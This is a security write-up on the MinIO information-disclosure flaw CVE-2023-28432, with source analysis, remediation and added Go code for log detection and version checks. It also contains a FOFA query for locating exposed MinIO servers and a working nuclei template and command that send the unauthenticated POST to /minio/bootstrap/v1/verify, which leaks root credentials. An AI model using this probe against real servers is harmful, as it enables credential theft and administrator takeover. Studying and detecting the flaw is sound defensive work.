MinIO Information Disclosure Vulnerability (CVE-2023-28432)

VSole, 2023-03-29 10:24:24

This technical article is for reference only. The information it provides is intended solely for network security personnel to test or maintain the websites, servers and other systems (including but not limited to these) for which they are responsible; do not use the technical material in this article to intrude into any computer system without authorization. Any direct or indirect consequences and losses caused by using the information in this article are the sole responsibility of the user. The tools provided here are for learning only; any other use is prohibited!

1. Vulnerability Description

MinIO has an information disclosure vulnerability. In a cluster (distributed) deployment of MinIO, an unauthenticated remote attacker can obtain all environment variables by sending a crafted HTTP request. These include MINIO_SECRET_KEY and MINIO_ROOT_PASSWORD, so sensitive information is leaked and the attacker may ultimately be able to log in to MinIO as an administrator.

2. Affected Versions

RELEASE.2019-12-17T23-16-33Z <= MinIO < RELEASE.2023-03-20T20-16-18Z

3. Impact

Exploiting this vulnerability yields all environment variables, including MINIO_SECRET_KEY and MINIO_ROOT_PASSWORD. This leaks sensitive information and may ultimately allow an attacker to log in to MinIO as an administrator.

4. Vulnerability Details

https://github.com/minio/minio/blob/master/cmd/bootstrap-peer-server.go#L197

```go
// Verify - fetches system server config.
func (client *bootstrapRESTClient) Verify(ctx context.Context, srcCfg ServerSystemConfig) (err error) {
	if newObjectLayerFn() != nil {
		return nil
	}
	respBody, err := client.callWithContext(ctx, bootstrapRESTMethodVerify, nil, nil, -1)
	if err != nil {
		return
	}
	defer xhttp.DrainBody(respBody)
	recvCfg := ServerSystemConfig{}
	if err = json.NewDecoder(respBody).Decode(&recvCfg); err != nil {
		return err
	}
	return srcCfg.Diff(recvCfg)
}
```

https://github.com/minio/minio/blob/master/cmd/bootstrap-peer-server.go#L54

```go
const (
	bootstrapRESTVersion       = "v1"
	bootstrapRESTVersionPrefix = SlashSeparator + bootstrapRESTVersion
	bootstrapRESTPrefix        = minioReservedBucketPath + "/bootstrap"
	bootstrapRESTPath          = bootstrapRESTPrefix + bootstrapRESTVersionPrefix
)

const (
	bootstrapRESTMethodHealth = "/health"
	bootstrapRESTMethodVerify = "/verify"
)

// To abstract a node over network.
type bootstrapRESTServer struct{}

// ServerSystemConfig - captures information about server configuration.
type ServerSystemConfig struct {
	MinioEndpoints EndpointServerPools
	MinioEnv       map[string]string
}
```

https://github.com/minio/minio/blob/master/cmd/bootstrap-peer-server.go#L149

```go
func (b *bootstrapRESTServer) VerifyHandler(w http.ResponseWriter, r *http.Request) {
	ctx := newContext(r, w, "VerifyHandler")

	if err := storageServerRequestValidate(r); err != nil {
		b.writeErrorResponse(w, err)
		return
	}

	cfg := getServerSystemCfg()
	logger.LogIf(ctx, json.NewEncoder(w).Encode(&cfg))
}

// registerBootstrapRESTHandlers - register bootstrap rest router.
func registerBootstrapRESTHandlers(router *mux.Router) {
	server := &bootstrapRESTServer{}
	subrouter := router.PathPrefix(bootstrapRESTPrefix).Subrouter()

	subrouter.Methods(http.MethodPost).Path(bootstrapRESTVersionPrefix + bootstrapRESTMethodHealth).HandlerFunc(
		httpTraceHdrs(server.HealthHandler))

	subrouter.Methods(http.MethodPost).Path(bootstrapRESTVersionPrefix + bootstrapRESTMethodVerify).HandlerFunc(
		httpTraceHdrs(server.VerifyHandler))
}
```

https://github.com/minio/minio/blob/master/cmd/object-api-utils.go#L210

```go
// SlashSeparator - slash separator.
const SlashSeparator = "/"
```

https://github.com/minio/minio/blob/master/cmd/generic-handlers.go#L138

```go
const (
	minioReservedBucket              = "minio"
	minioReservedBucketPath          = SlashSeparator + minioReservedBucket
	minioReservedBucketPathWithSlash = SlashSeparator + minioReservedBucket + SlashSeparator
)
```

Putting the constants together gives the route of the verify endpoint:

```
SlashSeparator             = "/"
minioReservedBucketPath    = SlashSeparator + minioReservedBucket                  ==> /minio
bootstrapRESTPrefix        = minioReservedBucketPath + "/bootstrap"                ==> /minio/bootstrap
bootstrapRESTVersion       = "v1"
bootstrapRESTVersionPrefix = SlashSeparator + bootstrapRESTVersion                 ==> /v1
bootstrapRESTMethodVerify  = "/verify"
subrouter.Methods(http.MethodPost).Path(bootstrapRESTVersionPrefix + bootstrapRESTMethodVerify) ==> /v1/verify
final path: /minio/bootstrap/v1/verify
```

The handler registered on that path accepts POST and writes getServerSystemCfg() to the response as JSON; ServerSystemConfig carries MinioEnv, a map of the node's environment variables, which is where MINIO_SECRET_KEY and MINIO_ROOT_PASSWORD end up in the response.
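As an added detection example (not code from this page or from MinIO): the Go program below scans constructed access-log lines from a reverse proxy in front of MinIO for POST requests to the verify path derived above and flags every source that is not a known cluster peer. The peer list, the log lines and the common-log-format layout are assumptions.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// Verify endpoint path derived above from the MinIO route constants.
const bootstrapVerifyPath = "/minio/bootstrap/v1/verify"
// Constructed sample access-log lines (common log format) from a reverse proxy in
// front of MinIO; not from a real deployment. Only 10.0.0.12 is a cluster peer.
const sampleLog = `10.0.0.12 - - [24/Mar/2023:10:01:02 +0800] "POST /minio/bootstrap/v1/verify HTTP/1.1" 200 1843
203.0.113.7 - - [24/Mar/2023:10:05:44 +0800] "POST /minio/bootstrap/v1/verify HTTP/1.1" 200 1843
203.0.113.7 - - [24/Mar/2023:10:05:45 +0800] "GET /minio/health/live HTTP/1.1" 200 0
198.51.100.9 - - [24/Mar/2023:10:06:01 +0800] "POST /minio/bootstrap/v1/verify/ HTTP/1.1" 404 0`
// Captures: source address, method, path, status code.
var logRe = regexp.MustCompile(`^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})`)

// Alert is one verify request that came from outside the cluster peer set.
type Alert struct {
	Source, Path, Status string
}

// FindBootstrapProbes returns POST requests to the verify endpoint whose source is not
// a known peer. Status 200 means the node answered, so the ServerSystemConfig JSON
// (including MinioEnv) should be treated as exposed and the credentials rotated.
func FindBootstrapProbes(accessLog string, peers map[string]bool) []Alert {
	var alerts []Alert
	for _, line := range strings.Split(accessLog, "\n") {
		m := logRe.FindStringSubmatch(line)
		if m == nil {
			continue
		}
		src, method, path, status := m[1], m[2], m[3], m[4]
		// A trailing slash counts as the same probe so path variants are not missed.
		if method != "POST" || strings.TrimSuffix(path, "/") != bootstrapVerifyPath || peers[src] {
			continue
		}
		alerts = append(alerts, Alert{src, path, status})
	}
	return alerts
}

func main() {
	peers := map[string]bool{"10.0.0.11": true, "10.0.0.12": true, "10.0.0.13": true}
	for _, a := range FindBootstrapProbes(sampleLog, peers) {
		fmt.Printf("ALERT %s POST %s -> %s (source is not a cluster peer)\n", a.Source, a.Path, a.Status)
	}
}
```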
    


FOFA query

```
banner="MinIO" || header="MinIO" || title="MinIO Browser"
```

### EXP/POC

```yaml
id: CVE-2023-28432

info:
  name: Minio post policy request security bypass
  author: Mr-xn
  severity: high
  description: Minio is a Multi-Cloud Object Storage framework. In a cluster deployment starting with RELEASE.2019-12-17T23-16-33Z and prior to RELEASE.2023-03-20T20-16-18Z, MinIO returns all environment variables, including MINIO_SECRET_KEY and MINIO_ROOT_PASSWORD, resulting in information disclosure. All users of distributed deployment are impacted. All users are advised to upgrade to RELEASE.2023-03-20T20-16-18Z.
  reference:
    - https://github.com/minio/minio/security/advisories/GHSA-6xvq-wj2x-3h3q
    - https://github.com/minio/minio/pull/16853/files
    - https://github.com/golang/vulndb/issues/1667
    - https://github.com/CVEProject/cvelist/blob/master/2023/28xxx/CVE-2023-28432.json
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-28432
    cwe-id: CWE-200
  tags: cve,cve2023

requests:
  - raw:
      - |+
        POST /minio/bootstrap/v1/verify HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"MinioEndpoints"'

      - type: word
        part: header
        words:
          - 'Content-Type: text/plain'

      - type: status
        status:
          - 200
```

### nuclei verification

```bash
nuclei -v -t /path/to/CVE-2023-28432.yaml -u http://target.com:port
```

(Screenshot: CVE-2023-28432-POC)

(Screenshot: CVE-2023-28432-result)

### Remediation

The vendor has released a fixed version; affected users should upgrade to RELEASE.2023-03-20T20-16-18Z or later:

https://github.com/minio/minio/releases/tag/RELEASE.2023-03-20T20-16-18Z
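An added example (not this page's or MinIO's own code) that turns the affected range from section 2 and the fixed build above into an inventory check: it parses MinIO build tags of the form RELEASE.YYYY-MM-DDTHH-MM-SSZ and reports whether each build lies inside the vulnerable range, treating unparseable tags as an error rather than as safe. The time layout and the sample inventory are assumptions.

```go
package main

import (
	"fmt"
	"strings"
	"time"
)

// MinIO build tags look like RELEASE.2023-03-20T20-16-18Z; this Go time layout
// matches the part after "RELEASE." (an assumption of this example, not MinIO's own code).
const releaseLayout = "2006-01-02T15-04-05Z"
// Bounds from the advisory: RELEASE.2019-12-17T23-16-33Z (first vulnerable build,
// inclusive) and RELEASE.2023-03-20T20-16-18Z (first fixed build, exclusive).
var (
	firstAffected = time.Date(2019, 12, 17, 23, 16, 33, 0, time.UTC)
	firstFixed    = time.Date(2023, 3, 20, 20, 16, 18, 0, time.UTC)
)

// parseTag converts a release tag into a comparable UTC timestamp.
func parseTag(tag string) (time.Time, error) {
	tag = strings.TrimSpace(tag)
	if !strings.HasPrefix(tag, "RELEASE.") {
		return time.Time{}, fmt.Errorf("not a MinIO release tag: %q", tag)
	}
	return time.Parse(releaseLayout, strings.TrimPrefix(tag, "RELEASE."))
}

// IsAffected reports whether a build falls inside the vulnerable range. An
// unparseable tag is returned as an error rather than silently treated as safe.
func IsAffected(tag string) (bool, error) {
	t, err := parseTag(tag)
	if err != nil {
		return false, err
	}
	return !t.Before(firstAffected) && t.Before(firstFixed), nil
}

func main() {
	// Constructed inventory: host -> build tag reported by that node.
	inventory := map[string]string{
		"minio-a.internal": "RELEASE.2022-10-24T18-35-07Z", // inside the range
		"minio-b.internal": "RELEASE.2023-03-20T20-16-18Z", // first fixed build
		"minio-c.internal": "RELEASE.2019-10-12T01-39-57Z", // predates the range
		"minio-d.internal": "unknown",                      // must be checked by hand
	}
	for host, tag := range inventory {
		affected, err := IsAffected(tag)
		fmt.Printf("%s: tag=%s affected=%v err=%v\n", host, tag, affected, err)
	}
}
```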

This work is licensed under the CC Agreement; reposts must credit the author and link to this article.